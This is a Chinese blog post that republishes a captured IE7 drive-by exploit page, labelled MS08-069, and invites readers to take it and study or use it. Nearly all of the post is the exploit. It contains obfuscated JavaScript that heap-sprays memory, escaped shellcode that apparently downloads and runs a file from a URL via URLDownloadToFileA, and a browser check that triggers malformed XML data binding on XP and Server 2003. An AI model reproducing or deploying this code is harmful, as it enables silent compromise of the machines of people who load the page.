话说这个 ms08069利用代码exploit 网马 代码好像和夜火我昨天发的[IE7漏洞0day exploit](/blog/ie7-0day-exploit “ie7漏洞0day exploit”的代码差不多,对代码这一块,我也不是很懂,发出来也只是给大家看,我自己没什么能力研究哈~,大家自行辨认。
据说有人已经发出来了,俺也把俺昨天抓的那个发出来吧。
如何用就自己拿去研究好了,自己小解了一下。
1<script>2function sleep(milliseconds)3{4var start=new Date().getTime();5for(var i=0;i<1e7;i++)6{7 if((new Date().getTime()-start)>milliseconds)8 {9 break10 }11}12}function spray(sc)13{14var bwkbnwvojsqweyvwgabdlie=0x0a0a0a0a;15var bwkbnwvojsqweyvwgabdlieyqfbygrgz=unescape;40 collapsed lines
16var asdfkj129312asdfasd=bwkbnwvojsqweyvwgabdlieyqfbygrgz(sc);17var heapBlockSize=0x100000;18var payLoadSize=asdfkj129312asdfasd.length*2;19var szlong=heapBlockSize-(payLoadSize+0x038);20var retVal=bwkbnwvojsqweyvwgabdlieyqfbygrgz("%u0a0a%u0a0a");21retVal=getSampleValue(retVal,szlong);22aaablk=(bwkbnwvojsqweyvwgabdlie-0x100000)/heapBlockSize;23zzchuck=new Array();24for(i=0;i<aaablk;i++)25{26 zzchuck[i]=retVal+asdfkj129312asdfasd27}28}29function getSampleValue(retVal,szlong)30{31while(retVal.length*2<szlong)32{33 retVal+=retVal34}retVal=retVal.substring(0,szlong/2);35return retVal36}var a1="%u";37spray("%u56e8%u0000%u5300%u5655%u8b57%u246c%u8b18%u3c45%u548b%u7805%uea01%u4a8b%u8b18%u205a%ueb01%u32e3%u8b49%u8b34%uee01%uff31%u31fc%uacc0%ue038%u0774%ucfc1%u010d%uebc7%u3bf2%u247c%u7514%u8be1%u245a%ueb01%u8b66%u4b0c%u5a8b%u011c%u8beb%u8b04%ue801%u02eb%uc031%u5e5f%u5b5d%u08c2%u5e00%u306a%u6459%u198b%u5b8b%u8b0c%u1c5b%u1b8b%u5b8b%u5308%u8e68%u0e4e%uffec%u89d6%u53c7%u8e68%u0e4e%uffec%uebd6%u5a50%uff52%u89d0%u52c2%u5352%uaa68%u0dfc%uff7c%u5ad6%u4deb%u5159%uff52%uebd0%u5a72%u5beb%u6a59%u6a00%u5100%u6a52%uff00%u53d0%ua068%uc9d5%uff4d%u5ad6%uff52%u53d0%u9868%u8afe%uff0e%uebd6%u5944%u006a%uff51%u53d0%u7e68%ue2d8%uff73%u6ad6%uff00%ue8d0%uffab%uffff%u7275%u6d6c%u6e6f%u642e%u6c6c%ue800%uffae%uffff%u5255%u444c%u776f%u6c6e%u616f%u5464%u466f%u6c69%u4165%ue800%uffa0%uffff%u2e2e%u765c%ue800%uffb7%uffff%u2e2e%u765c%ue800%uff89%uffff%u7468%u7074%u2f3a%u6c2f%u636f%u6c61%u6f68%u7473%u632f%u6c61%u2e63%u7865%u0065");38sleep(2000);39nav=navigator.userAgent.toLowerCase();40if(navigator.appVersion.indexOf('MSIE')!=-1)41{42version=parseFloat(navigator.appVersion.split('MSIE')[1])43}if(version==7)44{45w2k3=((nav.indexOf('windows nt 5.2')!=-1)||(nav.indexOf('windows 2003')!=-1));46wxp=((nav.indexOf('windows nt 5.1')!=-1)||(nav.indexOf('windows xp')!=-1));47if(wxp||w2k3)document.write('<XML ID=I><X><C><![CDATA[<image SRC=http://þਊr.test.net src=http://www.google.com]]><![CDATA[>]]></C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML><XML ID=I></XML><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>');48var i=1;49while(i<=10)50{51 window.status=" ";52 i++53}54}55</script>相关: MS08-068 Exploit -SmbRelay3 NTLM Replay Attack Tool/Exploit MS08-067漏洞批量检测程序-MS08-067 check MS08-067 Exploit for CN 2k/xp/2003 .net version MS08-067 Exploit for CN 2k/xp/2003 bypass version ms08-066 Exploit MS08-052 - MS Windows GDI+ Proof of Concept MS08-046 - MS Windows InternalOpenColorProfile Heap Overflow PoC ms08025 分析 Windows的内核漏洞